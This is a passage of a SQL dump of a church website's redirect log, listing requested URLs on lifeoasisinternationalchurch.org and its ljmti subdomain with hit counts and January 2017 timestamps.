(592, 'http://www.lifeoasisinternationalchurch.org/about-us/rev-oyenike-areogun/18-loic/50-young-achievers', NULL, '', '', 6, 0, '2017-01-04 07:57:47', '0000-00-00 00:00:00', 301),
(593, 'http://www.lifeoasisinternationalchurch.org/featured-messages', NULL, '', '', 46, 0, '2017-01-04 07:57:52', '0000-00-00 00:00:00', 301),
(594, 'http://www.lifeoasisinternationalchurch.org/ministries/gin', NULL, '', '', 27, 0, '2017-01-04 07:57:55', '0000-00-00 00:00:00', 301),
(595, 'http://www.lifeoasisinternationalchurch.org/ministries/mimmp', NULL, '', '', 37, 0, '2017-01-04 07:58:02', '0000-00-00 00:00:00', 301),
(596, 'http://www.lifeoasisinternationalchurch.org/ministries/outreach', NULL, '', '', 26, 0, '2017-01-04 07:58:06', '0000-00-00 00:00:00', 301),
(597, 'http://www.lifeoasisinternationalchurch.org/ministries/wimmp', NULL, '', '', 41, 0, '2017-01-04 07:58:08', '0000-00-00 00:00:00', 301),
(598, 'http://www.lifeoasisinternationalchurch.org/payment', NULL, '', '', 47, 0, '2017-01-04 07:58:10', '0000-00-00 00:00:00', 301),
(599, 'http://www.lifeoasisinternationalchurch.org/resources/father-s-heart', NULL, '', '', 41, 0, '2017-01-04 07:58:14', '0000-00-00 00:00:00', 301),
(600, 'http://www.lifeoasisinternationalchurch.org/resources/salvation', NULL, '', '', 106, 0, '2017-01-04 07:58:18', '0000-00-00 00:00:00', 301),
(601, 'http://www.lifeoasisinternationalchurch.org/resources/streaming-registered', NULL, '', '', 66, 0, '2017-01-04 07:58:22', '0000-00-00 00:00:00', 301),
(602, 'http://ljmti.lifeoasisinternationalchurch.org/k2-blog/user-page-blog/itemlist/tag/AudioJungle', NULL, '', '', 1, 0, '2017-01-04 08:52:35', '0000-00-00 00:00:00', 301),
(603, 'http://lifeoasisinternationalchurch.org/resources/blog…', NULL, '', '', 3, 0, '2017-01-04 09:04:04', '0000-00-00 00:00:00', 301),
(604, 'http://www.lifeoasisinternationalchurch.org/mp3-messages/sermon/7-enemies-of-gods-word-1', NULL, '', '', 37, 0, '2017-01-04 10:12:18', '0000-00-00 00:00:00', 301),
(605, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1947/1/-', NULL, '', '', 1, 0, '2017-01-04 10:27:40', '0000-00-00 00:00:00', 301),
(606, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2030/6/17/-', NULL, '', '', 1, 0, '2017-01-04 10:27:48', '0000-00-00 00:00:00', 301),
(607, 'http://www.lifeoasisinternationalchurch.org/index.php/component/jcomments/feed/com_sermonspeaker/29', NULL, '', '', 2, 0, '2017-01-04 11:50:36', '0000-00-00 00:00:00', 301),
(608, 'http://lifeoasisinternationalchurch.org/resources/2013-gobc-online-registration?view=login', NULL, '', '', 10, 0, '2017-01-04 12:13:08', '0000-00-00 00:00:00', 301),
(609, 'http://www.lifeoasisinternationalchurch.org/.well-known/apple-app-site-association', NULL, '', '', 37, 0, '2017-01-04 12:17:28', '0000-00-00 00:00:00', 301),
(610, 'http://lifeoasisinternationalchurch.org/apple-app-site-association', NULL, '', '', 29, 0, '2017-01-04 12:18:58', '0000-00-00 00:00:00', 301),
(611, 'http://lifeoasisinternationalchurch.org/.well-known/apple-app-site-association', NULL, '', '', 29, 0, '2017-01-04 12:19:05', '0000-00-00 00:00:00', 301),
(612, 'http://lifeoasisinternationalchurch.org/index.php/mp3-messages/sermon/6-dark-side-of-the-anointing-4', NULL, '', '', 19, 0, '2017-01-04 12:38:58', '0000-00-00 00:00:00', 301),
(613, 'http://lifeoasisinternationalchurch.org/mp3-messages/sermon/14-entering-into-winning-position-2', NULL, '', '', 24, 0, '2017-01-04 12:39:04', '0000-00-00 00:00:00', 301),
(614, 'http://lifeoasisinternationalchurch.org/index.php/11-kindom-builder/34-prayer-a-fasting-day-25', NULL, '', '', 4, 0, '2017-01-04 12:39:06', '0000-00-00 00:00:00', 301),
(615, 'http://lifeoasisinternationalchurch.org/index.php/mp3-messages/sermons/0/0?limitstart=0', NULL, '', '', 4, 0, '2017-01-04 12:39:06', '0000-00-00 00:00:00', 301),
(616, 'http://ljmti.lifeoasisinternationalchurch.org/k2-blog/blog-category/category-news/itemlist/tag/theme', NULL, '', '', 1, 0, '2017-01-04 12:47:00', '0000-00-00 00:00:00', 301),
(617, 'http://lifeoasisinternationalchurch.org/18-loic/44-programme', NULL, 'https://www.google.com.ng/', '', 15, 0, '2017-01-04 12:54:24', '0000-00-00 00:00:00', 301),
(618, 'http://ljmti.lifeoasisinternationalchurch.org/k2-blog/latest-items-by-users/itemlist/tag/envato', NULL, '', '', 1, 0, '2017-01-04 13:20:28', '0000-00-00 00:00:00', 301),
(619, 'http://lifeoasisinternationalchurch.org/lifestreaming', NULL, '', '', 1, 0, '2017-01-04 14:56:54', '0000-00-00 00:00:00', 301),
(620, 'http://www.lifeoasisinternationalchurch.org/template-info-2/the-church/18-loic/50-young-achievers', NULL, '', '', 2, 0, '2017-01-04 15:26:42', '0000-00-00 00:00:00', 301),
(621, 'http://www.lifeoasisinternationalchurch.org/index.php?option=com_extrawatch&origin=frontend&ewToken=f657f5ef020378882fa632bb9b97a7a6987c72ef&task=ajax&action=img&rand=0.6143674062333412&env=ExtraWatchJoomlaEnv&ref=&title=The Dream Centre of the Life Oasis Int\'l Church - Dream Centre of the Life Oasis Int\'l Church&uri=_SLASH_&referringQuery=&getParams=', NULL, 'http://www.lifeoasisinternationalchurch.org/', '', 1, 0, '2017-01-04 15:39:52', '0000-00-00 00:00:00', 301),
(622, 'http://ljmti.lifeoasisinternationalchurch.org/component/k2/itemlist/tag/Lighthouse', NULL, '', '', 1, 0, '2017-01-04 16:07:55', '0000-00-00 00:00:00', 301),
(623, 'http://www.lifeoasisinternationalchurch.org/index.php/11-kindom-builder/19-prayer-a-fasting-day-11', NULL, '', '', 7, 0, '2017-01-04 16:15:09', '0000-00-00 00:00:00', 301),
(624, 'http://www.lifeoasisinternationalchurch.org/index.php/mp3-messages/sermon/2-building-a-bilblical-relationship-with-the-word-of-god-2', NULL, '', '', 8, 0, '2017-01-04 16:17:29', '0000-00-00 00:00:00', 301),
(625, 'http://lifeoasisinternationalchurch.org/prayer-request/10-about-us', NULL, '', '', 2, 0, '2017-01-04 16:43:54', '0000-00-00 00:00:00', 301),
(626, 'http://www.lifeoasisinternationalchurch.org/resources', NULL, '', '', 9, 0, '2017-01-04 16:55:42', '0000-00-00 00:00:00', 301),
(627, 'http://www.lifeoasisinternationalchurch.org/loic-forum/16-divine-instructions/36-declaration2', NULL, '', '', 1, 0, '2017-01-04 17:18:31', '0000-00-00 00:00:00', 301),
(628, 'http://lifeoasisinternationalchurch.org/index.php/component/jcomments/feed/com_sermonspeaker/10', NULL, '', '', 2, 0, '2017-01-04 17:37:03', '0000-00-00 00:00:00', 301),
(629, 'http://www.lifeoasisinternationalchurch.org/prayer/7-kindom-builder/36-prayer-a-fasting-day-27', NULL, '', '', 1, 0, '2017-01-04 17:37:22', '0000-00-00 00:00:00', 301),
(630, 'http://ljmti.lifeoasisinternationalchurch.org/k2-blog/blog-category/category-joomla/itemlist/tag/envato', NULL, '', '', 1, 0, '2017-01-04 17:48:27', '0000-00-00 00:00:00', 301),
(631, 'http://www.lifeoasisinternationalchurch.org/index.php/149-day-22', NULL, '', '', 7, 0, '2017-01-04 17:52:07', '0000-00-00 00:00:00', 301),
(632, 'http://www.lifeoasisinternationalchurch.org/lifestreaming', NULL, '', '', 22, 0, '2017-01-04 17:53:01', '0000-00-00 00:00:00', 301),
(633, 'http://www.lifeoasisinternationalchurch.org/index.php/11-kindom-builder/36-prayer-a-fasting-day-27', NULL, '', '', 7, 0, '2017-01-04 17:56:15', '0000-00-00 00:00:00', 301),
(634, 'http://www.lifeoasisinternationalchurch.org/prayer/component/content/article/7-kindom-builder/36-prayer-a-fasting-day-27', NULL, '', '', 4, 0, '2017-01-04 18:12:06', '0000-00-00 00:00:00', 301),
(635, 'http://ljmti.lifeoasisinternationalchurch.org/tuition-fee/63-recent-news-update', NULL, '', '', 3, 0, '2017-01-04 18:25:20', '0000-00-00 00:00:00', 301),
(636, 'http://www.lifeoasisinternationalchurch.org/component/jcomments/feed/com_sermonspeaker/22', NULL, '', '', 7, 0, '2017-01-04 18:40:36', '0000-00-00 00:00:00', 301),
(637, 'http://www.lifeoasisinternationalchurch.org/error-logs.php', NULL, 'http://www.lifeoasisinternationalchurch.org/error-logs.php', '', 1, 0, '2017-01-04 19:24:49', '0000-00-00 00:00:00', 301),
(638, 'http://ljmti.lifeoasisinternationalchurch.org/digital/downloads?download=4:kingdom-leadership-studies-publication-6th-november-2016', NULL, '', '', 1, 0, '2017-01-04 20:35:57', '0000-00-00 00:00:00', 301),
(639, 'http://www.lifeoasisinternationalchurch.org/partnership/18-loic/50-young-achievers', NULL, '', '', 7, 0, '2017-01-04 20:40:27', '0000-00-00 00:00:00', 301),
(640, 'http://www.lifeoasisinternationalchurch.org/template-info-2/our-belief/18-loic/50-young-achievers', NULL, '', '', 5, 0, '2017-01-04 21:06:03', '0000-00-00 00:00:00', 301),
(641, 'http://ljmti.lifeoasisinternationalchurch.org/k2-blog/blog-category', NULL, '', '', 6, 0, '2017-01-04 21:09:30', '0000-00-00 00:00:00', 301),
(642, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2035/11/26/-', NULL, '', '', 1, 0, '2017-01-04 21:52:33', '0000-00-00 00:00:00', 301),
(643, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1947/12/-', NULL, '', '', 1, 0, '2017-01-04 21:52:52', '0000-00-00 00:00:00', 301),
(644, 'http://lifeoasisinternationalchurch.org/resources/hd', NULL, '', '', 57, 0, '2017-01-04 22:03:15', '0000-00-00 00:00:00', 301),
(645, 'http://ljmti.lifeoasisinternationalchurch.org/home/portfolio-layout', NULL, '', '', 4, 0, '2017-01-04 22:16:16', '0000-00-00 00:00:00', 301),
(646, 'http://www.lifeoasisinternationalchurch.org/index.php/243-day-5-of-21-days-fasting-and-prayer-october', NULL, '', '', 7, 0, '2017-01-04 22:18:47', '0000-00-00 00:00:00', 301),
(647, 'http://ljmti.lifeoasisinternationalchurch.org/portfolio', NULL, '', '', 1, 0, '2017-01-04 22:49:43', '0000-00-00 00:00:00', 301),
(648, 'http://www.lifeoasisinternationalchurch.org/hidden-stream', NULL, '', '', 30, 0, '2017-01-04 23:07:16', '0000-00-00 00:00:00', 301),
(649, 'http://lifeoasisinternationalchurch.org/templates/rt_ionosphere/css/css-5cfcfda318d771d4268420865bce0950.php', NULL, '', '', 22, 0, '2017-01-04 23:26:44', '0000-00-00 00:00:00', 301),
(650, 'http://www.lifeoasisinternationalchurch.org/index.php/62-prayer-focus-for-day-10', NULL, '', '', 6, 0, '2017-01-05 00:19:59', '0000-00-00 00:00:00', 301),
(651, 'http://www.lifeoasisinternationalchurch.org/component/jcomments/feed/com_sermonspeaker/9', NULL, '', '', 5, 0, '2017-01-05 00:59:26', '0000-00-00 00:00:00', 301),
(652, 'http://www.lifeoasisinternationalchurch.org/index.php/265-day-5-of-21-days-fasting-and-prayer-november', NULL, 'http://www.lifeoasisinternationalchurch.org/prayer/index.php/223-2016-day-6', '', 7, 0, '2017-01-05 01:52:04', '0000-00-00 00:00:00', 301),
(653, 'http://www.lifeoasisinternationalchurch.org/component/content/category/16-fp-tabs', NULL, '', '', 2, 0, '2017-01-05 02:08:34', '0000-00-00 00:00:00', 301),
(654, 'http://ljmti.lifeoasisinternationalchurch.org/digital/downloads?download=2:kingdom-leadership-studies-publication-20th-november-2016', NULL, '', '', 1, 0, '2017-01-05 03:22:44', '0000-00-00 00:00:00', 301),
(655, 'http://www.lifeoasisinternationalchurch.org/index.php/11-kindom-builder/33-prayer-a-fasting-day-24', NULL, '', '', 10, 0, '2017-01-05 06:19:11', '0000-00-00 00:00:00', 301),
(656, 'http://www.lifeoasisinternationalchurch.org/index.php/11-kindom-builder/51-prophetic-words-for-day-39', NULL, '', '', 32, 0, '2017-01-05 06:19:11', '0000-00-00 00:00:00', 301),
(657, 'http://www.lifeoasisinternationalchurch.org/index.php/programme/17-fp-headlines-lists', NULL, '', '', 2, 0, '2017-01-05 06:19:13', '0000-00-00 00:00:00', 301),
(658, 'http://www.lifeoasisinternationalchurch.org/index.php/programme/2-uncategorised', NULL, '', '', 3, 0, '2017-01-05 06:19:13', '0000-00-00 00:00:00', 301),
(659, 'http://www.lifeoasisinternationalchurch.org/index.php/template-info-2/rev-oyenike-areogun', NULL, '', '', 4, 0, '2017-01-05 06:19:13', '0000-00-00 00:00:00', 301),
(660, 'http://www.lifeoasisinternationalchurch.org/mp3-messages/speaker/2?limitstart=0', NULL, '', '', 1, 0, '2017-01-05 07:09:34', '0000-00-00 00:00:00', 301),
(661, 'http://lifeoasisinternationalchurch.org/index.php/104-prayerfocus31', NULL, '', '', 1, 0, '2017-01-05 07:37:30', '0000-00-00 00:00:00', 301),
(662, 'http://www.lifeoasisinternationalchurch.org/mp3-messages/sermon/21-dealing-with-buts-in-your-life', NULL, '', '', 56, 0, '2017-01-05 07:39:50', '0000-00-00 00:00:00', 301),
(663, 'http://www.lifeoasisinternationalchurch.org/index.php/155-day-28', NULL, '', '', 5, 0, '2017-01-05 08:13:22', '0000-00-00 00:00:00', 301),
(664, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1949/10/-', NULL, '', '', 1, 0, '2017-01-05 08:22:38', '0000-00-00 00:00:00', 301),
(665, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2028/7/17/-', NULL, '', '', 1, 0, '2017-01-05 08:22:44', '0000-00-00 00:00:00', 301),
(666, 'http://www.lifeoasisinternationalchurch.org/index.php/programme/16-fp-tabs', NULL, '', '', 8, 0, '2017-01-05 08:22:56', '0000-00-00 00:00:00', 301),
(667, 'http://www.lifeoasisinternationalchurch.org/index.php/template-info-2/dream-centre-ordained-pastors', NULL, '', '', 7, 0, '2017-01-05 08:23:01', '0000-00-00 00:00:00', 301),
(668, 'http://www.lifeoasisinternationalchurch.org/index.php/11-kindom-builder/58-prayer-a-fasting-day', NULL, '', '', 7, 0, '2017-01-05 09:28:55', '0000-00-00 00:00:00', 301),
(669, 'http://ljmti.lifeoasisinternationalchurch.org/ministries/young-adults', NULL, '', '', 3, 0, '2017-01-05 09:34:21', '0000-00-00 00:00:00', 301),
(670, 'http://www.lifeoasisinternationalchurch.org/index.php/202-2015-day-27', NULL, '', '', 7, 0, '2017-01-05 10:19:15', '0000-00-00 00:00:00', 301),
(671, 'http://ljmti.lifeoasisinternationalchurch.org/k2-blog/blog-category/category-wordpress/itemlist/tag/theme', NULL, '', '', 1, 0, '2017-01-05 11:54:15', '0000-00-00 00:00:00', 301),
(672, 'http://www.lifeoasisinternationalchurch.org/index.php/184-2015-day-8', NULL, '', '', 8, 0, '2017-01-05 12:03:41', '0000-00-00 00:00:00', 301),
(673, 'http://ljmti.lifeoasisinternationalchurch.org/k2-blog/blog-category/category-joomla/itemlist/tag/', NULL, '', '', 1, 0, '2017-01-05 13:34:43', '0000-00-00 00:00:00', 301),
(674, 'http://www.lifeoasisinternationalchurch.org/component/jcomments/feed/com_sermonspeaker/10', NULL, '', '', 4, 0, '2017-01-05 14:56:10', '0000-00-00 00:00:00', 301),
(675, 'http://lifeoasisinternationalchurch.org/18-prayer-a-fasting-day', NULL, '', '', 6, 0, '2017-01-05 15:36:48', '0000-00-00 00:00:00', 301),
(676, 'http://ljmti.lifeoasisinternationalchurch.org/digital/downloads?download=1:kingdom-leadership-studies-publication-30th-october-2016', NULL, '', '', 1, 0, '2017-01-05 16:22:10', '0000-00-00 00:00:00', 301),
(677, 'http://www.lifeoasisinternationalchurch.org/templates/rt_ionosphere/css/css-a7413756639d75a4b8ce2f4ac085019d.php', NULL, '', '', 88, 0, '2017-01-05 16:46:38', '0000-00-00 00:00:00', 301),
(678, 'http://lifeoasisinternationalchurch.org/ministries/outreach/18-loic/50-young-achievers', NULL, '', '', 3, 0, '2017-01-05 16:49:42', '0000-00-00 00:00:00', 301),
(679, 'http://www.lifeoasisinternationalchurch.org/template-info-2/the-church-2', NULL, '', '', 38, 0, '2017-01-05 17:35:21', '0000-00-00 00:00:00', 301),
(680, 'http://lifeoasisinternationalchurch.org/index.php/template-info/books', NULL, 'http://joshuaareogun.com/work/', '', 62, 0, '2017-01-05 17:38:44', '0000-00-00 00:00:00', 301),
(681, 'http://ljmti.lifeoasisinternationalchurch.org/k2-blog/blog-category/category-wordpress/itemlist/tag/church', NULL, '', '', 1, 0, '2017-01-05 18:02:44', '0000-00-00 00:00:00', 301),
(682, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1858/7/3/-', NULL, '', '', 1, 0, '2017-01-05 18:13:24', '0000-00-00 00:00:00', 301),
(683, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1853/3/7/-', NULL, '', '', 1, 0, '2017-01-05 18:24:49', '0000-00-00 00:00:00', 301),
(684, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1858/7/6/-', NULL, '', '', 1, 0, '2017-01-05 18:28:32', '0000-00-00 00:00:00', 301),
(685, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1854/2/14/-', NULL, '', '', 1, 0, '2017-01-05 18:32:19', '0000-00-00 00:00:00', 301),
(686, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1858/7/27/-', NULL, '', '', 1, 0, '2017-01-05 18:36:06', '0000-00-00 00:00:00', 301),
(687, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1853/3/25/-', NULL, '', '', 1, 0, '2017-01-05 18:39:53', '0000-00-00 00:00:00', 301),
(688, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1858/7/19/-', NULL, '', '', 1, 0, '2017-01-05 18:43:39', '0000-00-00 00:00:00', 301),
(689, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1853/3/30/-', NULL, '', '', 1, 0, '2017-01-05 18:47:28', '0000-00-00 00:00:00', 301),
(690, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1856/9/2/-', NULL, '', '', 1, 0, '2017-01-05 18:51:13', '0000-00-00 00:00:00', 301),
(691, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1855/10/22/-', NULL, '', '', 1, 0, '2017-01-05 18:55:01', '0000-00-00 00:00:00', 301),
(692, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1853/3/16/-', NULL, '', '', 1, 0, '2017-01-05 18:58:48', '0000-00-00 00:00:00', 301),
(693, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1856/9/30/-', NULL, '', '', 1, 0, '2017-01-05 19:02:35', '0000-00-00 00:00:00', 301),
(694, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1858/7/22/-', NULL, '', '', 1, 0, '2017-01-05 19:06:31', '0000-00-00 00:00:00', 301),
(695, 'http://ljmti.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=itemlist&task=tag&tag=Themeforest&Itemid=624', NULL, '', '', 1, 0, '2017-01-05 19:09:53', '0000-00-00 00:00:00', 301),
(696, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1854/2/7/-', NULL, '', '', 1, 0, '2017-01-05 19:10:07', '0000-00-00 00:00:00', 301),
(697, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1853/3/17/-', NULL, '', '', 1, 0, '2017-01-05 19:13:56', '0000-00-00 00:00:00', 301),
(698, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1854/2/15/-', NULL, '', '', 1, 0, '2017-01-05 19:17:42', '0000-00-00 00:00:00', 301),
(699, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1855/10/21/-', NULL, '', '', 1, 0, '2017-01-05 19:21:30', '0000-00-00 00:00:00', 301),
(700, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1854/2/22/-', NULL, '', '', 1, 0, '2017-01-05 19:25:23', '0000-00-00 00:00:00', 301),
(701, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1855/10/27/-', NULL, '', '', 1, 0, '2017-01-05 19:29:04', '0000-00-00 00:00:00', 301),
(702, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1858/7/9/-', NULL, '', '', 1, 0, '2017-01-05 19:32:51', '0000-00-00 00:00:00', 301),
(703, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1856/9/11/-', NULL, '', '', 1, 0, '2017-01-05 19:36:42', '0000-00-00 00:00:00', 301),
(704, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1856/9/3/-', NULL, '', '', 1, 0, '2017-01-05 19:40:26', '0000-00-00 00:00:00', 301),
(705, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1854/2/21/-', NULL, '', '', 1, 0, '2017-01-05 19:44:17', '0000-00-00 00:00:00', 301),
(706, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1856/9/24/-', NULL, '', '', 1, 0, '2017-01-05 19:48:00', '0000-00-00 00:00:00', 301),
(707, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1853/3/10/-', NULL, '', '', 1, 0, '2017-01-05 19:51:47', '0000-00-00 00:00:00', 301),
(708, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1854/2/10/-', NULL, '', '', 1, 0, '2017-01-05 19:55:49', '0000-00-00 00:00:00', 301),
(709, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1853/3/9/-', NULL, '', '', 1, 0, '2017-01-05 19:59:19', '0000-00-00 00:00:00', 301),
(710, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1855/10/26/-', NULL, '', '', 1, 0, '2017-01-05 20:03:07', '0000-00-00 00:00:00', 301),
(711, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1854/2/5/-', NULL, '', '', 1, 0, '2017-01-05 20:06:53', '0000-00-00 00:00:00', 301),
(712, 'http://lifeoasisinternationalchurch.org/template-info/ljmti/18-loic/50-young-achievers', NULL, '', '', 2, 0, '2017-01-05 20:07:19', '0000-00-00 00:00:00', 301),
(713, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1856/9/20/-', NULL, '', '', 1, 0, '2017-01-05 20:10:45', '0000-00-00 00:00:00', 301),
(714, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1856/9/8/-', NULL, '', '', 1, 0, '2017-01-05 20:14:27', '0000-00-00 00:00:00', 301),
(715, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1856/9/29/-', NULL, '', '', 1, 0, '2017-01-05 20:18:13', '0000-00-00 00:00:00', 301),
(716, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1853/3/24/-', NULL, '', '', 1, 0, '2017-01-05 20:22:09', '0000-00-00 00:00:00', 301),
(717, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1858/7/30/-', NULL, '', '', 1, 0, '2017-01-05 20:25:48', '0000-00-00 00:00:00', 301),
(718, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1856/9/21/-', NULL, '', '', 1, 0, '2017-01-05 20:29:36', '0000-00-00 00:00:00', 301),
(719, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1855/10/19/-', NULL, '', '', 1, 0, '2017-01-05 20:33:23', '0000-00-00 00:00:00', 301),
(720, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1856/9/18/-', NULL, '', '', 1, 0, '2017-01-05 20:37:10', '0000-00-00 00:00:00', 301),
(721, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1854/2/6/-', NULL, '', '', 1, 0, '2017-01-05 20:40:59', '0000-00-00 00:00:00', 301),
(722, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1854/2/19/-', NULL, '', '', 1, 0, '2017-01-05 20:44:43', '0000-00-00 00:00:00', 301),
(723, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1856/9/23/-', NULL, '', '', 1, 0, '2017-01-05 20:48:29', '0000-00-00 00:00:00', 301),
(724, 'http://lifeoasisinternationalchurch.org/index.php/template-info/mimmp/18-loic/50-young-achievers', NULL, '', '', 2, 0, '2017-01-05 20:50:44', '0000-00-00 00:00:00', 301),
(725, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1855/10/10/-', NULL, '', '', 1, 0, '2017-01-05 20:52:18', '0000-00-00 00:00:00', 301),
(726, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/monthcalendar/1949/9/-', NULL, '', '', 1, 0, '2017-01-05 20:59:50', '0000-00-00 00:00:00', 301),
(727, 'http://ljmti.lifeoasisinternationalchurch.org/calendar/eventsbyday/2030/5/10/-', NULL, '', '', 1, 0, '2017-01-05 21:03:37', '0000-00-00 00:00:00', 301),
(728, 'http://www.lifeoasisinternationalchurch.org/prayer/52-prophetic-words-for-day-4', NULL, '', '', 8, 0, '2017-01-05 21:10:22', '0000-00-00 00:00:00', 301),
(729, 'http://lifeoasisinternationalchurch.org/index.php/140-day-14', NULL, '', '', 1, 0, '2017-01-05 21:23:16', '0000-00-00 00:00:00', 301),
(730, 'http://www.lifeoasisinternationalchurch.org/about-us/the-church/18-loic/50-young-achievers', NULL, '', '', 6, 0, '2017-01-05 23:19:40', '0000-00-00 00:00:00', 301),
(731, 'http://www.lifeoasisinternationalchurch.org/index.php/mp3-messages/sermon/22-dealing-with-buts-in-your-life-2', NULL, '', '', 3, 0, '2017-01-06 00:20:27', '0000-00-00 00:00:00', 301),
(732, 'http://www.lifeoasisinternationalchurch.org/55-day1', NULL, '', '', 6, 0, '2017-01-06 01:00:21', '0000-00-00 00:00:00', 301),
(733, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1856/9/19/-', NULL, '', '', 1, 0, '2017-01-06 01:20:29', '0000-00-00 00:00:00', 301),
(734, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1855/10/12/-', NULL, '', '', 1, 0, '2017-01-06 01:20:35', '0000-00-00 00:00:00', 301),
(735, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1856/9/17/-', NULL, '', '', 1, 0, '2017-01-06 01:20:41', '0000-00-00 00:00:00', 301),
(736, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1853/3/22/-', NULL, '', '', 1, 0, '2017-01-06 01:20:46', '0000-00-00 00:00:00', 301),
(737, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1855/10/6/-', NULL, '', '', 1, 0, '2017-01-06 01:20:52', '0000-00-00 00:00:00', 301),
(738, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1856/9/12/-', NULL, '', '', 1, 0, '2017-01-06 01:20:58', '0000-00-00 00:00:00', 301),
(739, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1858/7/12/-', NULL, '', '', 1, 0, '2017-01-06 01:21:04', '0000-00-00 00:00:00', 301),
(740, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1855/10/11/-', NULL, '', '', 1, 0, '2017-01-06 01:21:09', '0000-00-00 00:00:00', 301),
(741, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1853/3/21/-', NULL, '', '', 1, 0, '2017-01-06 01:21:15', '0000-00-00 00:00:00', 301),
(742, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1854/2/27/-', NULL, '', '', 1, 0, '2017-01-06 01:21:21', '0000-00-00 00:00:00', 301),
(743, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1854/2/17/-', NULL, '', '', 1, 0, '2017-01-06 01:21:26', '0000-00-00 00:00:00', 301),
(744, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1858/7/17/-', NULL, '', '', 1, 0, '2017-01-06 01:21:32', '0000-00-00 00:00:00', 301),
(745, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1855/10/25/-', NULL, '', '', 1, 0, '2017-01-06 01:21:38', '0000-00-00 00:00:00', 301),
(746, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1855/10/4/-', NULL, '', '', 1, 0, '2017-01-06 01:21:43', '0000-00-00 00:00:00', 301),
(747, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1858/7/11/-', NULL, '', '', 1, 0, '2017-01-06 01:21:49', '0000-00-00 00:00:00', 301),
(748, 'http://ljmti.lifeoasisinternationalchurch.org/quick-recent-events/eventsbyday/1854/2/25/-', NULL, '', '', 1, 0, '2017-01-06 01:21:55', '0000-00-00 00:00:00', 301),
